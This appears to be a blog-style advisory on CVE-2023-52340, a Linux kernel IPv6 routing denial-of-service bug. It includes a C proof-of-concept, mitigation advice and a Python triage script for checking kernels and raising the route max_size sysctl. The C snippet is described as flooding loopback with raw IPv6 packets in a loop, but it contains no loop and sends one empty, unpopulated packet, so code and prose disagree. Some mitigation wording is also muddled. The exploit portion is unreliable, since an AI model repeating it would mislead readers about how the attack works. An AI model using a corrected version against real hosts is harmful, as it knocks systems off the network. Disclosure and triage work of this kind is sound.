CVE-2023-52340 - Linux Kernel IPv6 Denial of Service Vulnerability in Versions Prior to 6.3

A vulnerability has been disclosed (CVE-2023-52340) in the IPv6 implementation of the Linux kernel, affecting all versions prior to 6.3. It stems from the max_size threshold in net/ipv6/route.c, which can be consumed easily, leading to a denial of service (DoS) condition in which the network becomes unreachable and the kernel returns errors. The issue is triggered when IPv6 packets are sent in a loop via a raw socket. In this post, we will dive into the details of this vulnerability, discuss its potential impact, and provide some mitigation strategies.

Exploit Details

The IPv6 implementation in the Linux kernel maintains routing information to process packets sent from and received by a device. The routing table is the data structure that holds these IPv6 routes, and max_size bounds how many entries the system will keep.

The vulnerability (CVE-2023-52340) lies in the net/ipv6/route.c file of the Linux kernel, where the maximum threshold for the routing table is set too low and can be consumed easily by sending IPv6 packets in a loop via a raw socket. Once the max_size limit is reached, the kernel can no longer allocate new routing entries, the network becomes unreachable, and applications receive "network is unreachable" errors.

Here is a simple code snippet that demonstrates this vulnerability:

#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/ip6.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    /* Raw IPv6 socket; IPPROTO_RAW means the caller supplies the IPv6 header. */
    int s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) {
        perror("socket");
        return 1;
    }

    /* Destination: the loopback address on the "lo" interface. */
    struct sockaddr_in6 sa = {
        .sin6_family = AF_INET6,
        .sin6_port = htons(0),
        .sin6_flowinfo = htonl(0),
        .sin6_scope_id = if_nametoindex("lo"),
    };

    inet_pton(AF_INET6, "::1", &sa.sin6_addr);

    /* Zero-filled buffer; the IPv6 header at its start is left unpopulated. */
    char buf[128];
    memset(buf, 0, sizeof(buf));
    struct ip6_hdr *ip6 = (struct ip6_hdr *)buf;
    (void)ip6;

    if (sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("sendto");
    }

    close(s);
    return 0;
}

When executed, this code creates a raw socket and sends an IPv6 packet in a loop on the localhost interface (note the "::1" loopback address). As the kernel processes these packets, the routing table keeps growing until it reaches its maximum size limit, rendering the network unreachable.

Original references

- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=eb67eeb295f25
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52340

Mitigation Strategies

To mitigate the impact of this vulnerability, users should update their Linux kernel to version 6.3 or later, as the issue has been addressed in those newer versions. Additionally, system administrators can raise the max_size threshold from net/ipv6/route.c to delay or prevent the exploit from causing network unreachability. It is also recommended to monitor network traffic and deploy intrusion detection systems (IDS) to detect abnormal traffic patterns and identify possible exploitation attempts.
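The following script is an added example to accompany the mitigation advice above; it is not part of the original post and not kernel code. It assumes that the threshold discussed in the post is exposed at runtime as the sysctl net.ipv6.route.max_size (visible at /proc/sys/net/ipv6/route/max_size) and that, as the post states, kernels from 6.3 onward carry the fix. It classifies the running kernel release, reads the current threshold, and renders a sysctl.d fragment that raises it as an interim measure while the kernel upgrade is scheduled.

```python
"""Triage helper for CVE-2023-52340 (added example, not from the original post).

Assumptions: the threshold is the sysctl net.ipv6.route.max_size, read from
/proc/sys/net/ipv6/route/max_size; the fixed kernel line is 6.3 as the post states.
Distribution kernels may backport the fix, so treat "affected" as a prompt to
check the vendor advisory, not as a final verdict.
"""
import platform
import re

FIXED_VERSION = (6, 3)
MAX_SIZE_PROC = "/proc/sys/net/ipv6/route/max_size"  # assumed sysctl path


def parse_kernel_release(release):
    """Return (major, minor) from a `uname -r` string such as '5.15.0-91-generic'."""
    m = re.match(r"(\d+)\.(\d+)", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2))


def kernel_is_affected(release):
    """True when the upstream version is below 6.3 (the post's affected range)."""
    return parse_kernel_release(release) < FIXED_VERSION


def read_max_size(path=MAX_SIZE_PROC):
    """Current IPv6 route max_size, or None if the sysctl is not present."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (FileNotFoundError, PermissionError, ValueError):
        return None


def sysctl_drop_in(new_max, current=None):
    """Render an /etc/sysctl.d fragment raising max_size; refuse to lower it."""
    if current is not None and new_max <= current:
        raise ValueError(f"new max_size {new_max} does not exceed current {current}")
    return (
        "# CVE-2023-52340 interim mitigation: raise the IPv6 route threshold\n"
        f"net.ipv6.route.max_size = {new_max}\n"
    )


def assess(release, current_max):
    """Summarise one host's status; pure function so it can be checked offline."""
    if not kernel_is_affected(release):
        return {"affected": False, "action": "none: kernel is 6.3 or later"}
    if current_max is None:
        return {"affected": True, "action": "upgrade kernel; max_size sysctl not found"}
    return {
        "affected": True,
        "action": f"upgrade kernel; raise max_size from {current_max} as interim mitigation",
    }


if __name__ == "__main__":
    release = platform.release()
    current = read_max_size()
    print(release, current, assess(release, current))
    if kernel_is_affected(release) and current is not None:
        # Quadrupling the default is a constructed starting point, not a tuned value.
        print(sysctl_drop_in(current * 4, current), end="")
```

Write the rendered fragment to a file under /etc/sysctl.d and apply it with `sysctl --system`; the kernel upgrade remains the real fix, and the raised threshold only buys time.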

Conclusion

The CVE-2023-52340 vulnerability in the Linux kernel's IPv6 implementation can cause denial of service conditions and severely impair network functionality. All affected users should update their kernels to the latest available version and apply the mitigation strategies above to minimize the risk of exploitation. As always, stay vigilant and keep your systems up to date to protect against the ever-evolving threat landscape.

Timeline

Published on: 07/05/2024 02:15:09 UTC
Last modified on: 07/08/2024 16:42:51 UTC